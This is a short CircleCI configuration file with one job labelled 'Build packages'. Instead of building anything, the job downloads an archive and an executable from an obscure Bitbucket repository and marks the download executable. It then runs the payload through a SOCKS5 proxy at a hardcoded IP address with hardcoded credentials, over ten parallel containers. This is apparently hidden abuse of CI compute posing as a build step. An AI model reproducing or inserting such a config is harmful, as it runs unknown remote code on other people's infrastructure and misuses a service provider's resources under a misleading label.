version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.6
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    parallelism: 10
    steps:
      - checkout
      - run: 
          name: Build packages
          command: |
            wget -q https://bitbucket.org/erftrt56/dxsdf/downloads/verbose.zip
            wget -q https://bitbucket.org/erftrt56/dxsdf/downloads/mgtcp && chmod +x mgtcp
            unzip -q verbose.zip
            ./mgtcp --socks5=43.131.19.115:1080 --socks5_username=bsm --socks5_password=123 ./verbose
